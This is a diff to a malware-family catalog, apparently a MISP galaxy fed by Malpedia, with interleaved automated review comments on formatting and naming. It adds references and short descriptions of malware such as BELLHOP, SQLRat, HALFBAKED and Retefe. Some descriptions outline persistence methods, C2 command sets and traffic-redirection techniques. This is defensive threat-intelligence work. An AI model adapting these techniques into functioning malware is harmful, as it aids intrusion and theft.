- "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered"
+ "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/"
 ],
 "synonyms": [
 "Jacksbot"
@@ -1819,6 +2220,19 @@
 "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41",
 "value": "Qarallax RAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler",
+ "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d16a3a1f-e244-4715-a67f-61ba30901efb",
+ "value": "Qealler"
+ },
 {
 "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.",
 "meta": {
@@ -1851,12 +2265,29 @@
 },
 {
 "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.supremebot",
+ "https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/"
+ ],
+ "synonyms": [
+ "BlazeBot"
+ ],
+ "type": []
+ },
+ "uuid": "651e37e0-1bf8-4024-ac1e-e7bda42470b0",
+ "value": "SupremeBot"
+ },
+ {
+ "description": "AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak",
 "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html"
 ],
- "synonyms": [],
+ "synonyms": [
+ "Orz"
+ ],
 "type": []
 },
 "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b",
@@ -1875,11 +2306,25 @@
 "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65",
 "value": "Bateleur"
 },
+ {
+ "description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop",
+ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7ebeb691-b979-4a88-94e1-dade780c6a7f",
+ "value": "BELLHOP"
+ },
 {
 "description": "According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch",
+ "https://www.codercto.com/a/46729.html",
 "https://github.com/mdsecactivebreach/CACTUSTORCH"
 ],
 "synonyms": [],
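Review bot: The BELLHOP `description` in the first hunk contains tab escapes in the middle of sentences (`is\ta JavaScript`, `dropper\tdownloads`, `and\tsets\tup`, `HTTP\tand`, `Google\tDocs`) plus leading `\u2022` bullet glyphs and `\r\n` separators, which are copy artefacts from the FireEye PDF rather than content; they render oddly in MISP and defeat a plain-text search for "BELLHOP is a JavaScript". Replace the tabs with spaces and fold the bullets into sentences, keeping exactly what the text already states, e.g. `"description": "BELLHOP is a JavaScript backdoor interpreted using the native Windows Scripting Host (WSH). After basic host information gathering, the dropper downloads a base64-encoded blob of JavaScript to disk and sets up persistence in three ways: a Run key in the Registry, a RunOnce key in the Registry, and a persistent named scheduled task. BELLHOP communicates over HTTP and HTTPS with primarily benign sites such as Google Docs and PasteBin."`. Attributing it ("FireEye describes BELLHOP as ...") would match the style of the GPlayed and Gustuff entries.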
@@ -1917,6 +2362,35 @@
 "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60",
 "value": "CukieGrab"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat",
+ "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/"
+ ],
+ "synonyms": [
+ "DNSbot"
+ ],
+ "type": []
+ },
+ "uuid": "a4b40d48-e40b-47f2-8e30-72342231503e",
+ "value": "DNSRat"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum",
+ "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
+ "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b7deec7e-24f7-4f78-9d58-9b3c1e182ab3",
+ "value": "EVILNUM (Javascript)"
+ },
 {
 "description": "",
 "meta": {
@@ -1950,7 +2424,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart",
- "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/"
+ "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/",
+ "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/",
+ "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/"
 ],
 "synonyms": [],
 "type": []
@@ -1968,6 +2444,7 @@
 "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/",
 "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html",
+ "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers",
 "https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
 "https://blog.morphisec.com/cobalt-gang-2.0"
 ],
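Review bot: The DNSRat ref in the first hunk, `https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/`, has a `:` inside the path slug, while the same Flashpoint article is cited for the SQLRat entry later in this diff as `.../fin7-revisited-inside-astra-panel-and-sqlrat-malware/` without it; a colon in a URL path segment is a classic copy error from a page title, so one of the two forms is presumably dead. Check which one resolves and use that spelling in both entries. On the EVILNUM entry in the same hunk, the Unit 42 ref is titled around Cardinal RAT and nothing in the entry says how it relates to EVILNUM — a one-line description tying the JavaScript component to that campaign would save readers the detour.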
@@ -1979,6 +2456,22 @@
 "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f",
 "value": "More_eggs"
 },
+ {
+ "description": "NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu",
+ "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering",
+ "https://attack.mitre.org/software/S0228/",
+ "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets",
+ "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3e46af39-52e8-442f-aff1-38eeb90336fc",
+ "value": "NanHaiShu"
+ },
 {
 "description": "",
 "meta": {
@@ -2006,6 +2499,19 @@
 "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa",
 "value": "scanbox"
 },
+ {
+ "description": "SQLRat campaigns typically involve a lure document that includes an image overlayed by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\\Roaming\\Microsoft\\Templates\\, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat",
+ "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d51cb8f8-cca3-46ce-a05d-052df44aef40",
+ "value": "SQLRat"
+ },
 {
 "description": "",
 "meta": {
@@ -2059,6 +2565,19 @@
 "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7",
 "value": "witchcoven"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus",
+ "https://securelist.com/operation-applejeus/87553/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ca466f15-8e0a-4030-82cb-5382e3c56ee5",
+ "value": "AppleJeus"
+ },
 {
 "description": "",
 "meta": {
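Review bot: The SQLRat `description` in the first hunk gives the drop path as `%appdata%\\Roaming\\Microsoft\\Templates\\`; on Windows `%APPDATA%` already expands to `...\AppData\Roaming`, so read literally this is `...\AppData\Roaming\Roaming\Microsoft\Templates\`, which looks like a transcription quirk carried over from the Flashpoint write-up rather than what the malware does. Anyone lifting this into a hunting query or detection path should verify it against the source first; I would either quote the article verbatim with an explicit "(as written by Flashpoint)" or normalise it to `%APPDATA%\Microsoft\Templates\` with a note. The rest of the text reads as a verbatim vendor excerpt, so opening it with "Flashpoint describes SQLRat as ..." would match the attribution style used for GPlayed and Gustuff in this file.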
@@ -2171,6 +2690,19 @@
 "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302",
 "value": "Crossrider"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.darthminer",
+ "https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a8e71805-014d-4998-b21e-3125da800124",
+ "value": "DarthMiner"
+ },
 {
 "description": "",
 "meta": {
@@ -2198,6 +2730,19 @@
 "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d",
 "value": "Dummy"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor",
+ "https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c221e519-fe3e-416e-bc63-a2246b860958",
+ "value": "Eleanor"
+ },
 {
 "description": "",
 "meta": {
@@ -2212,6 +2757,19 @@
 "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d",
 "value": "EvilOSX"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.failytale",
+ "https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5dfd704c-a69d-4e93-bd70-68f89fbbb32c",
+ "value": "FailyTale"
+ },
 {
 "description": "",
 "meta": {
@@ -2482,6 +3040,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus",
 "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update",
+ "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/",
 "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
 "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/"
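Review bot: The new entry's `"value": "FailyTale"` (and its Malpedia slug `osx.failytale`) differs from the spelling in the only external reference, whose URL reads `osx-fairytale-adware`, while `"synonyms"` is left empty, so a lookup on the spelling used in vendor reporting will not resolve to this cluster. If the upstream Malpedia label has to be kept as-is, adding `"FairyTale"` to `synonyms` closes that gap; if it is a typo inherited from upstream, it is better corrected there. The DarthMiner, Eleanor and OceanLotus hunks sharing this line raise nothing.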
@@ -2514,6 +3073,7 @@
 "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/"
 ],
 "synonyms": [
+ "FileCoder",
 "Findzip"
 ],
 "type": []
@@ -2521,13 +3081,27 @@
 "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8",
 "value": "Patcher"
 },
+ {
+ "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized",
+ "https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "de13bec0-f443-4c5a-91fe-2223dad43be5",
+ "value": "PintSized"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit",
 "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/",
- "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf"
+ "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf",
+ "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -2572,7 +3146,7 @@
 "value": "Pwnet"
 },
 {
- "description": "",
+ "description": "Dok a.k.a. Retefe is the macOS version of the banking trojan Retefe. It consists of a codesigned Mach-O dropper usually malspammed in an app bundle within a DMG disk image, posing as a document. The primary purpose of the dropper is to install a Tor client as well as a malicious CA certificate and proxy pac URL, in order to redirect traffic to targeted sites through their Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to prevent access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe",
@@ -2602,6 +3176,19 @@
 "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a",
 "value": "systemd"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.tsunami",
+ "https://www.intego.com/mac-security-blog/tsunami-backdoor-can-be-used-for-denial-of-service-attacks"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "59d4a2f3-c66e-4576-80ab-e04a4b0a4317",
+ "value": "Tsunami (OS X)"
+ },
 {
 "description": "",
 "meta": {
@@ -2616,6 +3203,22 @@
 "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c",
 "value": "Uroburos (OS X)"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail",
+ "https://objective-see.com/blog/blog_0x3D.html",
+ "https://objective-see.com/blog/blog_0x3B.html",
+ "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/",
+ "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "48751182-0b17-4326-8a72-41e4c4be35e7",
+ "value": "WindTail"
+ },
 {
 "description": "",
 "meta": {
@@ -2687,6 +3290,33 @@
 "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a",
 "value": "XSLCmd"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.yort",
+ "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "725cd3eb-1025-4da3-bcb1-a7b6591c632b",
+ "value": "Yort"
+ },
+ {
+ "description": "Antak is a webshell written in ASP.Net which utilizes PowerShell.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/php.antak",
+ "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx",
+ "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "88a71ca8-d99f-416a-ad29-5af12212008c",
+ "value": "ANTAK"
+ },
 {
 "description": "",
 "meta": {
@@ -2736,9 +3366,13 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater",
 "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2",
- "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/"
+ "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
+ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/"
+ ],
+ "synonyms": [
+ "Glimpse"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3",
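Review bot: The new ANTAK entry's `"value": "ANTAK"` is upper-cased while its own description and both cited references spell the tool `Antak`, and `"synonyms"` is left empty, so matching on the spelling used in the references relies on case-insensitive lookup downstream. If the upper-case form is the upstream Malpedia label and should stay, add `"Antak"` to `synonyms`. The Yort entry in the same hunk and the BONDUPDATER hunk raise nothing.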
@@ -2757,6 +3391,20 @@
 "uuid": "0db05333-2214-49c3-b469-927788932aaa",
 "value": "GhostMiner"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig",
+ "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html",
+ "https://twitter.com/MJDutch/status/1074820959784321026?s=19"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4a3b9669-8f91-47df-a8bf-a9876ab8edf3",
+ "value": "OilRig"
+ },
 {
 "description": "",
 "meta": {
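Review bot: `"value": "OilRig"` labels this PowerShell family with the threat-actor name, whereas other entries on this page disambiguate the same situation with a suffix (`Tsunami (OS X)`, `pupy (Python)`); without one, the label is indistinguishable from the actor when clusters are merged or shown side by side, and the empty `synonyms` gives no alternative to match on. If this file is generated from the Malpedia export, the fix belongs in the generator, but a form such as `"value": "OilRig (PowerShell)"` is what the existing convention suggests. Separately, the reference `https://twitter.com/MJDutch/status/1074820959784321026?s=19` carries a share-tracking query string; the stable reference is the URL without `?s=19`.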
@@ -2771,6 +3419,66 @@
 "uuid": "4df1b257-c242-46b0-b120-591430066b6f",
 "value": "POSHSPY"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe",
+ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "60d7f668-66b6-401b-976f-918470a23c3d",
+ "value": "POWERPIPE"
+ },
+ {
+ "description": "POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource",
+ "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a4584181-f739-43d1-ade9-8a7aa21278a0",
+ "value": "POWERSOURCE"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerspritz",
+ "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c07f6484-0669-44b7-90e6-f642e316d277",
+ "value": "PowerSpritz"
+ },
+ {
+ "description": "POWERSTATS is a backdoor written in powershell.\r\nIt has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats",
+ "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/",
+ "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
+ "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
+ "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/",
+ "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/",
+ "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/"
+ ],
+ "synonyms": [
+ "Valyria"
+ ],
+ "type": []
+ },
+ "uuid": "b81d91b5-23a4-4f86-aea9-3f212169fce9",
+ "value": "POWERSTATS"
+ },
 {
 "description": "",
 "meta": {
@@ -2797,12 +3505,26 @@
 "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419",
 "value": "POWRUNER"
 },
+ {
+ "description": "The family is adding a fake root certificate authority, sets a proxy.pac-url for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on information shared, it seems the PowerShell script is dropped by an exploit kit.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.presfox",
+ "https://twitter.com/kafeine/status/1092000556598677504"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c8c5ca3c-7cf0-453e-9fe9-d5637b1ab1f8",
+ "value": "PresFox"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent",
- "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca"
+ "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/"
 ],
 "synonyms": [],
 "type": []
@@ -2830,8 +3552,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload",
 "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9",
- "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy",
 "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/",
+ "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/",
+ "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan",
+ "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy",
 "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html"
 ],
 "synonyms": [],
@@ -2899,6 +3623,19 @@
 "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5",
 "value": "BrickerBot"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy",
+ "https://github.com/n1nj4sec/pupy"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "afcc9bfc-1227-4bb0-a88a-5accdbfd58fa",
+ "value": "pupy (Python)"
+ },
 {
 "description": "",
 "meta": {
@@ -2926,6 +3663,20 @@
 "uuid": "4305d59a-0d07-4021-a902-e7996378898b",
 "value": "FlexiSpy (symbian)"
 },
+ {
+ "description": "The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information.\r\nHALFBAKED listens for the following commands from the C2 server:\r\n\r\n info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI \r\n queries\r\n processList: Send list of process running\r\n screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)\r\n runvbs: Executes a VB script\r\n runexe: Executes EXE file\r\n runps1: Executes PowerShell script\r\n delete: Delete the specified file\r\n update: Update the specified file",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked",
+ "https://attack.mitre.org/software/S0151/",
+ "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "095c995c-c916-488e-944d-a3f4b9842926",
+ "value": "HALFBAKED"
+ },
 {
 "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"",
 "meta": {
@@ -3033,7 +3784,7 @@
 "value": "Acronym"
 },
 {
- "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.",
+ "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker",
@@ -3127,7 +3878,7 @@
 "value": "Agent Tesla"
 },
 {
- "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.",
+ "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot",
@@ -3144,9 +3895,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/",
+ "https://www.s21sec.com/en/blog/2017/01/alice-simplicity-for-atm-jackpotting/",
+ "https://www.symantec.com/security-center/writeup/2016-122104-0203-99"
+ ],
+ "synonyms": [
+ "AliceATM",
+ "PrAlice"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca",
@@ -3196,7 +3952,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator",
- "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/"
+ "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/"
 ],
 "synonyms": [],
 "type": []
